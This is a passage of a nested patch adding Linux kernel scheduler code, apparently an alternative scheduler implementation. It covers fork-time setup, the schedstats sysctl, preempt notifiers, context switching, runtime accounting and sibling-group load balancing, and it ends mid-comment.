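++#endif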
++
++/*
++ * Perform scheduler related setup for a newly forked process p.
++ * p is forked by current.
++ *
++ * __sched_fork() is basic setup used by init_idle() too:
++ */
++static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	p->on_rq			= 0;
++	p->on_cpu			= 0;
++	p->utime			= 0;
++	p->stime			= 0;
++	p->sched_time			= 0;
++
++#ifdef CONFIG_SCHEDSTATS
++	/* Even if schedstat is disabled, there should not be garbage */
++	memset(&p->stats, 0, sizeof(p->stats));
++#endif
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++	INIT_HLIST_HEAD(&p->preempt_notifiers);
++#endif
++
++#ifdef CONFIG_COMPACTION
++	p->capture_control = NULL;
++#endif
++#ifdef CONFIG_SMP
++	p->wake_entry.u_flags = CSD_TYPE_TTWU;
++#endif
++}
++
++/*
++ * fork()/clone()-time setup:
++ */
++int sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	__sched_fork(clone_flags, p);
++	/*
++	 * We mark the process as NEW here. This guarantees that
++	 * nobody will actually run it, and a signal or other external
++	 * event cannot wake it up and insert it on the runqueue either.
++	 */
++	p->__state = TASK_NEW;
++
++	/*
++	 * Make sure we do not leak PI boosting priority to the child.
++	 */
++	p->prio = current->normal_prio;
++
++	/*
++	 * Revert to default priority/policy on fork if requested.
++	 */
++	if (unlikely(p->sched_reset_on_fork)) {
++		if (task_has_rt_policy(p)) {
++			p->policy = SCHED_NORMAL;
++			p->static_prio = NICE_TO_PRIO(0);
++			p->rt_priority = 0;
++		} else if (PRIO_TO_NICE(p->static_prio) < 0)
++			p->static_prio = NICE_TO_PRIO(0);
++
++		p->prio = p->normal_prio = p->static_prio;
++
++		/*
++		 * We don't need the reset flag anymore after the fork. It has
++		 * fulfilled its duty:
++		 */
++		p->sched_reset_on_fork = 0;
++	}
++
++#ifdef CONFIG_SCHED_INFO
++	if (unlikely(sched_info_on()))
++		memset(&p->sched_info, 0, sizeof(p->sched_info));
++#endif
++	init_task_preempt_count(p);
++
++	return 0;
++}
++
++void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	/*
++	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
++	 * required yet, but lockdep gets upset if rules are violated.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	/*
++	 * Share the timeslice between parent and child, thus the
++	 * total amount of pending timeslices in the system doesn't change,
++	 * resulting in more scheduling fairness.
++	 */
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	rq->curr->time_slice /= 2;
++	p->time_slice = rq->curr->time_slice;
++#ifdef CONFIG_SCHED_HRTICK
++	hrtick_start(rq, rq->curr->time_slice);
++#endif
++
++	if (p->time_slice < RESCHED_NS) {
++		p->time_slice = sched_timeslice_ns;
++		resched_curr(rq);
++	}
++	sched_task_fork(p, rq);
++	raw_spin_unlock(&rq->lock);
++
++	rseq_migrate(p);
++	/*
++	 * We're setting the CPU for the first time, we don't migrate,
++	 * so use __set_task_cpu().
++	 */
++	__set_task_cpu(p, smp_processor_id());
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++void sched_post_fork(struct task_struct *p)
++{
++}
++
++#ifdef CONFIG_SCHEDSTATS
++
++DEFINE_STATIC_KEY_FALSE(sched_schedstats);
++
++static void set_schedstats(bool enabled)
++{
++	if (enabled)
++		static_branch_enable(&sched_schedstats);
++	else
++		static_branch_disable(&sched_schedstats);
++}
++
++void force_schedstat_enabled(void)
++{
++	if (!schedstat_enabled()) {
++		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
++		static_branch_enable(&sched_schedstats);
++	}
++}
++
++static int __init setup_schedstats(char *str)
++{
++	int ret = 0;
++	if (!str)
++		goto out;
++
++	if (!strcmp(str, "enable")) {
++		set_schedstats(true);
++		ret = 1;
++	} else if (!strcmp(str, "disable")) {
++		set_schedstats(false);
++		ret = 1;
++	}
++out:
++	if (!ret)
++		pr_warn("Unable to parse schedstats=\n");
++
++	return ret;
++}
++__setup("schedstats=", setup_schedstats);
++
++#ifdef CONFIG_PROC_SYSCTL
++static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
++		size_t *lenp, loff_t *ppos)
++{
++	struct ctl_table t;
++	int err;
++	int state = static_branch_likely(&sched_schedstats);
++
++	if (write && !capable(CAP_SYS_ADMIN))
++		return -EPERM;
++
++	t = *table;
++	t.data = &state;
++	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
++	if (err < 0)
++		return err;
++	if (write)
++		set_schedstats(state);
++	return err;
++}
++
++static struct ctl_table sched_core_sysctls[] = {
++	{
++		.procname       = "sched_schedstats",
++		.data           = NULL,
++		.maxlen         = sizeof(unsigned int),
++		.mode           = 0644,
++		.proc_handler   = sysctl_schedstats,
++		.extra1         = SYSCTL_ZERO,
++		.extra2         = SYSCTL_ONE,
++	},
++	{}
++};
++static int __init sched_core_sysctl_init(void)
++{
++	register_sysctl_init("kernel", sched_core_sysctls);
++	return 0;
++}
++late_initcall(sched_core_sysctl_init);
++#endif /* CONFIG_PROC_SYSCTL */
++#endif /* CONFIG_SCHEDSTATS */
++
++/*
++ * wake_up_new_task - wake up a newly created task for the first time.
++ *
++ * This function will do some initial scheduler statistics housekeeping
++ * that must be done for every newly created context, then puts the task
++ * on the runqueue and wakes it.
++ */
++void wake_up_new_task(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	rq = cpu_rq(select_task_rq(p));
++#ifdef CONFIG_SMP
++	rseq_migrate(p);
++	/*
++	 * Fork balancing, do it here and not earlier because:
++	 * - cpus_ptr can change in the fork path
++	 * - any previously selected CPU might disappear through hotplug
++	 *
++	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
++	 * as we're not fully set-up yet.
++	 */
++	__set_task_cpu(p, cpu_of(rq));
++#endif
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	activate_task(p, rq);
++	trace_sched_wakeup_new(p);
++	check_preempt_curr(rq);
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++
++static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
++
++void preempt_notifier_inc(void)
++{
++	static_branch_inc(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_inc);
++
++void preempt_notifier_dec(void)
++{
++	static_branch_dec(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_dec);
++
++/**
++ * preempt_notifier_register - tell me when current is being preempted & rescheduled
++ * @notifier: notifier struct to register
++ */
++void preempt_notifier_register(struct preempt_notifier *notifier)
++{
++	if (!static_branch_unlikely(&preempt_notifier_key))
++		WARN(1, "registering preempt_notifier while notifiers disabled\n");
++
++	hlist_add_head(&notifier->link, &current->preempt_notifiers);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_register);
++
++/**
++ * preempt_notifier_unregister - no longer interested in preemption notifications
++ * @notifier: notifier struct to unregister
++ *
++ * This is *not* safe to call from within a preemption notifier.
++ */
++void preempt_notifier_unregister(struct preempt_notifier *notifier)
++{
++	hlist_del(&notifier->link);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
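++
++/*
++ * Editorial note: an illustrative sketch of wiring up a preempt notifier.
++ * struct preempt_ops and preempt_notifier_init() come from
++ * <linux/preempt.h>; the callbacks and helper below are hypothetical.
++ */
++#if 0	/* illustrative example only */
++static void example_sched_in(struct preempt_notifier *pn, int cpu)
++{
++	/* current was just scheduled in on @cpu */
++}
++
++static void example_sched_out(struct preempt_notifier *pn,
++			      struct task_struct *next)
++{
++	/* current is being scheduled out in favour of @next */
++}
++
++static struct preempt_ops example_preempt_ops = {
++	.sched_in	= example_sched_in,
++	.sched_out	= example_sched_out,
++};
++
++static void example_attach_notifier(struct preempt_notifier *pn)
++{
++	preempt_notifier_inc();			/* enable the static key */
++	preempt_notifier_init(pn, &example_preempt_ops);
++	preempt_notifier_register(pn);		/* affects current only  */
++}
++#endif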
++
++static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_in(notifier, raw_smp_processor_id());
++}
++
++static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_in_preempt_notifiers(curr);
++}
++
++static void
++__fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				   struct task_struct *next)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_out(notifier, next);
++}
++
++static __always_inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_out_preempt_notifiers(curr, next);
++}
++
++#else /* !CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++}
++
++static inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++}
++
++#endif /* CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void prepare_task(struct task_struct *next)
++{
++	/*
++	 * Claim the task as running, we do this before switching to it
++	 * such that any running task will have this set.
++	 *
++	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
++	 * its ordering comment.
++	 */
++	WRITE_ONCE(next->on_cpu, 1);
++}
++
++static inline void finish_task(struct task_struct *prev)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * This must be the very last reference to @prev from this CPU. After
++	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
++	 * must ensure this doesn't happen until the switch is completely
++	 * finished.
++	 *
++	 * In particular, the load of prev->state in finish_task_switch() must
++	 * happen before this.
++	 *
++	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
++	 */
++	smp_store_release(&prev->on_cpu, 0);
++#else
++	prev->on_cpu = 0;
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	void (*func)(struct rq *rq);
++	struct balance_callback *next;
++
++	lockdep_assert_held(&rq->lock);
++
++	while (head) {
++		func = (void (*)(struct rq *))head->func;
++		next = head->next;
++		head->next = NULL;
++		head = next;
++
++		func(rq);
++	}
++}
++
++static void balance_push(struct rq *rq);
++
++/*
++ * balance_push_callback is a right abuse of the callback interface and plays
++ * by significantly different rules.
++ *
++ * Where the normal balance_callback's purpose is to be run in the same context
++ * that queued it (only later, when it's safe to drop rq->lock again),
++ * balance_push_callback is specifically targeted at __schedule().
++ *
++ * This abuse is tolerated because it places all the unlikely/odd cases behind
++ * a single test, namely: rq->balance_callback == NULL.
++ */
++struct balance_callback balance_push_callback = {
++	.next = NULL,
++	.func = balance_push,
++};
++
++static inline struct balance_callback *
++__splice_balance_callbacks(struct rq *rq, bool split)
++{
++	struct balance_callback *head = rq->balance_callback;
++
++	if (likely(!head))
++		return NULL;
++
++	lockdep_assert_rq_held(rq);
++	/*
++	 * Must not take balance_push_callback off the list when
++	 * splice_balance_callbacks() and balance_callbacks() are not
++	 * in the same rq->lock section.
++	 *
++	 * In that case it would be possible for __schedule() to interleave
++	 * and observe the list empty.
++	 */
++	if (split && head == &balance_push_callback)
++		head = NULL;
++	else
++		rq->balance_callback = NULL;
++
++	return head;
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return __splice_balance_callbacks(rq, true);
++}
++
++static void __balance_callbacks(struct rq *rq)
++{
++	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	unsigned long flags;
++
++	if (unlikely(head)) {
++		raw_spin_lock_irqsave(&rq->lock, flags);
++		do_balance_callbacks(rq, head);
++		raw_spin_unlock_irqrestore(&rq->lock, flags);
++	}
++}
++
++#else
++
++static inline void __balance_callbacks(struct rq *rq)
++{
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return NULL;
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++}
++
++#endif
++
++static inline void
++prepare_lock_switch(struct rq *rq, struct task_struct *next)
++{
++	/*
++	 * The runqueue lock will be released by the next
++	 * task (which is an invalid locking op but in the case
++	 * of the scheduler it's an obvious special-case), so we
++	 * do an early lockdep release here:
++	 */
++	spin_release(&rq->lock.dep_map, _THIS_IP_);
++#ifdef CONFIG_DEBUG_SPINLOCK
++	/* this is a valid case when another task releases the spinlock */
++	rq->lock.owner = next;
++#endif
++}
++
++static inline void finish_lock_switch(struct rq *rq)
++{
++	/*
++	 * If we are tracking spinlock dependencies then we have to
++	 * fix up the runqueue lock - which gets 'carried over' from
++	 * prev into current:
++	 */
++	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
++	__balance_callbacks(rq);
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++/*
++ * NOP if the arch has not defined these:
++ */
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++static inline void kmap_local_sched_out(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_out();
++#endif
++}
++
++static inline void kmap_local_sched_in(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_in();
++#endif
++}
++
++/**
++ * prepare_task_switch - prepare to switch tasks
++ * @rq: the runqueue preparing to switch
++ * @prev: the task we are switching away from
++ * @next: the task we are going to switch to.
++ *
++ * This is called with the rq lock held and interrupts off. It must
++ * be paired with a subsequent finish_task_switch after the context
++ * switch.
++ *
++ * prepare_task_switch sets up locking and calls architecture specific
++ * hooks.
++ */
++static inline void
++prepare_task_switch(struct rq *rq, struct task_struct *prev,
++		    struct task_struct *next)
++{
++	kcov_prepare_switch(prev);
++	sched_info_switch(rq, prev, next);
++	perf_event_task_sched_out(prev, next);
++	rseq_preempt(prev);
++	fire_sched_out_preempt_notifiers(prev, next);
++	kmap_local_sched_out();
++	prepare_task(next);
++	prepare_arch_switch(next);
++}
++
++/**
++ * finish_task_switch - clean up after a task-switch
++ * @rq: runqueue associated with task-switch
++ * @prev: the thread we just switched away from.
++ *
++ * finish_task_switch must be called after the context switch, paired
++ * with a prepare_task_switch call before the context switch.
++ * finish_task_switch will reconcile locking set up by prepare_task_switch,
++ * and do any other architecture-specific cleanup actions.
++ *
++ * Note that we may have delayed dropping an mm in context_switch(). If
++ * so, we finish that here outside of the runqueue lock.  (Doing it
++ * with the lock held can cause deadlocks; see schedule() for
++ * details.)
++ *
++ * The context switch has flipped the stack from under us and restored the
++ * local variables which were saved when this task called schedule() in the
++ * past. prev == current is still correct but we need to recalculate this_rq
++ * because prev may have moved to another CPU.
++ */
++static struct rq *finish_task_switch(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	struct rq *rq = this_rq();
++	struct mm_struct *mm = rq->prev_mm;
++	unsigned int prev_state;
++
++	/*
++	 * The previous task will have left us with a preempt_count of 2
++	 * because it left us after:
++	 *
++	 *	schedule()
++	 *	  preempt_disable();			// 1
++	 *	  __schedule()
++	 *	    raw_spin_lock_irq(&rq->lock)	// 2
++	 *
++	 * Also, see FORK_PREEMPT_COUNT.
++	 */
++	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
++		      "corrupted preempt_count: %s/%d/0x%x\n",
++		      current->comm, current->pid, preempt_count()))
++		preempt_count_set(FORK_PREEMPT_COUNT);
++
++	rq->prev_mm = NULL;
++
++	/*
++	 * A task struct has one reference for the use as "current".
++	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
++	 * schedule one last time. The schedule call will never return, and
++	 * the scheduled task must drop that reference.
++	 *
++	 * We must observe prev->state before clearing prev->on_cpu (in
++	 * finish_task), otherwise a concurrent wakeup can get prev
++	 * running on another CPU and we could race with its RUNNING -> DEAD
++	 * transition, resulting in a double drop.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	vtime_task_switch(prev);
++	perf_event_task_sched_in(prev, current);
++	finish_task(prev);
++	tick_nohz_task_switch();
++	finish_lock_switch(rq);
++	finish_arch_post_lock_switch();
++	kcov_finish_switch(current);
++	/*
++	 * kmap_local_sched_out() is invoked with rq::lock held and
++	 * interrupts disabled. There is no requirement for that, but the
++	 * sched out code does not have an interrupt enabled section.
++	 * Restoring the maps on sched in does not require interrupts being
++	 * disabled either.
++	 */
++	kmap_local_sched_in();
++
++	fire_sched_in_preempt_notifiers(current);
++	/*
++	 * When switching through a kernel thread, the loop in
++	 * membarrier_{private,global}_expedited() may have observed that
++	 * kernel thread and not issued an IPI. It is therefore possible to
++	 * schedule between user->kernel->user threads without passing through
++	 * switch_mm(). Membarrier requires a barrier after storing to
++	 * rq->curr, before returning to userspace, so provide them here:
++	 *
++	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
++	 *   provided by mmdrop(),
++	 * - a sync_core for SYNC_CORE.
++	 */
++	if (mm) {
++		membarrier_mm_sync_core_before_usermode(mm);
++		mmdrop_sched(mm);
++	}
++	if (unlikely(prev_state == TASK_DEAD)) {
++		/* Task is done with its stack. */
++		put_task_stack(prev);
++
++		put_task_struct_rcu_user(prev);
++	}
++
++	return rq;
++}
++
++/**
++ * schedule_tail - first thing a freshly forked thread must call.
++ * @prev: the thread we just switched away from.
++ */
++asmlinkage __visible void schedule_tail(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	/*
++	 * New tasks start with FORK_PREEMPT_COUNT, see there and
++	 * finish_task_switch() for details.
++	 *
++	 * finish_task_switch() will drop rq->lock and lower preempt_count
++	 * and the preempt_enable() will end up enabling preemption (on
++	 * PREEMPT_COUNT kernels).
++	 */
++
++	finish_task_switch(prev);
++	preempt_enable();
++
++	if (current->set_child_tid)
++		put_user(task_pid_vnr(current), current->set_child_tid);
++
++	calculate_sigpending();
++}
++
++/*
++ * context_switch - switch to the new MM and the new thread's register state.
++ */
++static __always_inline struct rq *
++context_switch(struct rq *rq, struct task_struct *prev,
++	       struct task_struct *next)
++{
++	prepare_task_switch(rq, prev, next);
++
++	/*
++	 * For paravirt, this is coupled with an exit in switch_to to
++	 * combine the page table reload and the switch backend into
++	 * one hypercall.
++	 */
++	arch_start_context_switch(prev);
++
++	/*
++	 * kernel -> kernel   lazy + transfer active
++	 *   user -> kernel   lazy + mmgrab() active
++	 *
++	 * kernel ->   user   switch + mmdrop() active
++	 *   user ->   user   switch
++	 */
++	if (!next->mm) {                                // to kernel
++		enter_lazy_tlb(prev->active_mm, next);
++
++		next->active_mm = prev->active_mm;
++		if (prev->mm)                           // from user
++			mmgrab(prev->active_mm);
++		else
++			prev->active_mm = NULL;
++	} else {                                        // to user
++		membarrier_switch_mm(rq, prev->active_mm, next->mm);
++		/*
++		 * sys_membarrier() requires an smp_mb() between setting
++		 * rq->curr / membarrier_switch_mm() and returning to userspace.
++		 *
++		 * The below provides this either through switch_mm(), or in
++		 * case 'prev->active_mm == next->mm' through
++		 * finish_task_switch()'s mmdrop().
++		 */
++		switch_mm_irqs_off(prev->active_mm, next->mm, next);
++		lru_gen_use_mm(next->mm);
++
++		if (!prev->mm) {                        // from kernel
++			/* will mmdrop() in finish_task_switch(). */
++			rq->prev_mm = prev->active_mm;
++			prev->active_mm = NULL;
++		}
++	}
++
++	prepare_lock_switch(rq, next);
++
++	/* Here we just switch the register state and the stack. */
++	switch_to(prev, next, prev);
++	barrier();
++
++	return finish_task_switch(prev);
++}
++
++/*
++ * nr_running, nr_uninterruptible and nr_context_switches:
++ *
++ * externally visible scheduler statistics: current number of runnable
++ * threads, total number of context switches performed since bootup.
++ */
++unsigned int nr_running(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_online_cpu(i)
++		sum += cpu_rq(i)->nr_running;
++
++	return sum;
++}
++
++/*
++ * Check if only the current task is running on the CPU.
++ *
++ * Caution: this function does not check that the caller has disabled
++ * preemption, thus the result might have a time-of-check-to-time-of-use
++ * race.  The caller is responsible for using it correctly, for example:
++ *
++ * - from a non-preemptible section (of course)
++ *
++ * - from a thread that is bound to a single CPU
++ *
++ * - in a loop with very short iterations (e.g. a polling loop)
++ */
++bool single_task_running(void)
++{
++	return raw_rq()->nr_running == 1;
++}
++EXPORT_SYMBOL(single_task_running);
++
++unsigned long long nr_context_switches(void)
++{
++	int i;
++	unsigned long long sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += cpu_rq(i)->nr_switches;
++
++	return sum;
++}
++
++/*
++ * Consumers of these two interfaces, such as the cpuidle menu governor,
++ * are using nonsensical data: they prefer a shallow idle state for a CPU
++ * that has IO-wait, even though that CPU might not even end up running
++ * the task when it does become runnable.
++ */
++
++unsigned int nr_iowait_cpu(int cpu)
++{
++	return atomic_read(&cpu_rq(cpu)->nr_iowait);
++}
++
++/*
++ * IO-wait accounting, and how it's mostly bollocks (on SMP).
++ *
++ * The idea behind IO-wait account is to account the idle time that we could
++ * have spent running if it were not for IO. That is, if we were to improve the
++ * storage performance, we'd have a proportional reduction in IO-wait time.
++ *
++ * This all works nicely on UP, where, when a task blocks on IO, we account
++ * idle time as IO-wait, because if the storage were faster, it could've been
++ * running and we'd not be idle.
++ *
++ * This has been extended to SMP, by doing the same for each CPU. This however
++ * is broken.
++ *
++ * Imagine for instance the case where two tasks block on one CPU, only the one
++ * CPU will have IO-wait accounted, while the other has regular idle. Even
++ * though, if the storage were faster, both could have run at the same time,
++ * utilising both CPUs.
++ *
++ * This means that, looking globally, the current IO-wait accounting on
++ * SMP is a lower bound, due to under-accounting.
++ *
++ * Worse, since the numbers are provided per CPU, they are sometimes
++ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
++ * associated with any one particular CPU; it can wake on a different CPU than
++ * the one it blocked on. This means the per-CPU IO-wait number is meaningless.
++ *
++ * Task CPU affinities can make all that even more 'interesting'.
++ */
++
++unsigned int nr_iowait(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += nr_iowait_cpu(i);
++
++	return sum;
++}
++
++#ifdef CONFIG_SMP
++
++/*
++ * sched_exec - execve() is a valuable balancing opportunity, because at
++ * this point the task has the smallest effective memory and cache
++ * footprint.
++ */
++void sched_exec(void)
++{
++}
++
++#endif
++
++DEFINE_PER_CPU(struct kernel_stat, kstat);
++DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
++
++EXPORT_PER_CPU_SYMBOL(kstat);
++EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
++
++static inline void update_curr(struct rq *rq, struct task_struct *p)
++{
++	s64 ns = rq->clock_task - p->last_ran;
++
++	p->sched_time += ns;
++	cgroup_account_cputime(p, ns);
++	account_group_exec_runtime(p, ns);
++
++	p->time_slice -= ns;
++	p->last_ran = rq->clock_task;
++}
++
++/*
++ * Return accounted runtime for the task.
++ * Separately return the current task's pending runtime that has not been
++ * accounted yet.
++ */
++unsigned long long task_sched_runtime(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	u64 ns;
++
++#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
++	/*
++	 * 64-bit doesn't need locks to atomically read a 64-bit value.
++	 * So we have an optimization chance when the task's delta_exec is 0.
++	 * Reading ->on_cpu is racy, but this is ok.
++	 *
++	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
++	 * If we race with it entering CPU, unaccounted time is 0. This is
++	 * indistinguishable from the read occurring a few cycles earlier.
++	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
++	 * been accounted, so we're correct here as well.
++	 */
++	if (!p->on_cpu || !task_on_rq_queued(p))
++		return tsk_seruntime(p);
++#endif
++
++	rq = task_access_lock_irqsave(p, &lock, &flags);
++	/*
++	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
++	 * project cycles that may never be accounted to this
++	 * thread, breaking clock_gettime().
++	 */
++	if (p == rq->curr && task_on_rq_queued(p)) {
++		update_rq_clock(rq);
++		update_curr(rq, p);
++	}
++	ns = tsk_seruntime(p);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++	return ns;
++}
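++
++/*
++ * Editorial usage note: this path backs thread CPU-clock reads such as
++ * clock_gettime(CLOCK_THREAD_CPUTIME_ID, &ts) from userspace (via the
++ * posix-cpu-timers code), which is why the still-pending delta of a
++ * running task is folded in above.
++ */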
++
++/* This manages tasks that have run out of timeslice during a scheduler_tick */
++static inline void scheduler_task_tick(struct rq *rq)
++{
++	struct task_struct *p = rq->curr;
++
++	if (is_idle_task(p))
++		return;
++
++	update_curr(rq, p);
++	cpufreq_update_util(rq, 0);
++
++	/*
++	 * Tasks with less than RESCHED_NS of time slice left will be
++	 * rescheduled.
++	 */
++	if (p->time_slice >= RESCHED_NS)
++		return;
++	set_tsk_need_resched(p);
++	set_preempt_need_resched();
++}
++
++#ifdef CONFIG_SCHED_DEBUG
++static u64 cpu_resched_latency(struct rq *rq)
++{
++	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
++	u64 resched_latency, now = rq_clock(rq);
++	static bool warned_once;
++
++	if (sysctl_resched_latency_warn_once && warned_once)
++		return 0;
++
++	if (!need_resched() || !latency_warn_ms)
++		return 0;
++
++	if (system_state == SYSTEM_BOOTING)
++		return 0;
++
++	if (!rq->last_seen_need_resched_ns) {
++		rq->last_seen_need_resched_ns = now;
++		rq->ticks_without_resched = 0;
++		return 0;
++	}
++
++	rq->ticks_without_resched++;
++	resched_latency = now - rq->last_seen_need_resched_ns;
++	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
++		return 0;
++
++	warned_once = true;
++
++	return resched_latency;
++}
++
++static int __init setup_resched_latency_warn_ms(char *str)
++{
++	long val;
++
++	if ((kstrtol(str, 0, &val))) {
++		pr_warn("Unable to set resched_latency_warn_ms\n");
++		return 1;
++	}
++
++	sysctl_resched_latency_warn_ms = val;
++	return 1;
++}
++__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
++#else
++static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
++#endif /* CONFIG_SCHED_DEBUG */
++
++/*
++ * This function gets called by the timer code, with HZ frequency.
++ * We call it with interrupts disabled.
++ */
++void scheduler_tick(void)
++{
++	int cpu __maybe_unused = smp_processor_id();
++	struct rq *rq = cpu_rq(cpu);
++	u64 resched_latency;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		arch_scale_freq_tick();
++
++	sched_clock_tick();
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	scheduler_task_tick(rq);
++	if (sched_feat(LATENCY_WARN))
++		resched_latency = cpu_resched_latency(rq);
++	calc_global_load_tick(rq);
++
++	rq->last_tick = rq->clock;
++	raw_spin_unlock(&rq->lock);
++
++	if (sched_feat(LATENCY_WARN) && resched_latency)
++		resched_latency_warn(cpu, resched_latency);
++
++	perf_event_task_tick();
++}
++
++#ifdef CONFIG_SCHED_SMT
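++/*
++ * sg_balance_cpu_stop - CPU stopper callback for sibling-group balance.
++ * @data is the task selected by sg_balance_trigger(); if it is still
++ * queued on this rq, still allowed to migrate and can run within
++ * sched_sg_idle_mask, move it to the best idle sibling-group CPU.
++ */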
++static inline int sg_balance_cpu_stop(void *data)
++{
++	struct rq *rq = this_rq();
++	struct task_struct *p = data;
++	cpumask_t tmp;
++	unsigned long flags;
++
++	local_irq_save(flags);
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++
++	rq->active_balance = 0;
++	/* _something_ may have changed the task, double check again */
++	if (task_on_rq_queued(p) && task_rq(p) == rq &&
++	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
++	    !is_migration_disabled(p)) {
++		int cpu = cpu_of(rq);
++		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
++		rq = move_queued_task(rq, p, dcpu);
++	}
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock(&p->pi_lock);
++
++	local_irq_restore(flags);
++
++	return 0;
++}
++
++/* sg_balance_trigger - trigger sibling group balance for @cpu */
++static inline int sg_balance_trigger(const int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	struct task_struct *curr;
++	int res;
++
++	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
++		return 0;
++	curr = rq->curr;
++	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&
++	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&
++	      !is_migration_disabled(curr) && (!rq->active_balance);
++
++	if (res)
++		rq->active_balance = 1;
++
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	if (res)
++		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
++				    &rq->active_balance_work);
++	return res;
++}
++
++/*
++ * sg_balance - sibling group balance check for run queue @rq
++ */
++static inline void sg_balance(struct rq *rq)
++{
++	cpumask_t chk;
++	int cpu = cpu_of(rq);
++
++	/* exit when cpu is offline */
++	if (unlikely(!rq->online))
++		return;
++
++	/*
++	 * Only a cpu in a sibling idle group does the checking, and then
++	 * finds potential cpus to which the currently running task can migrate
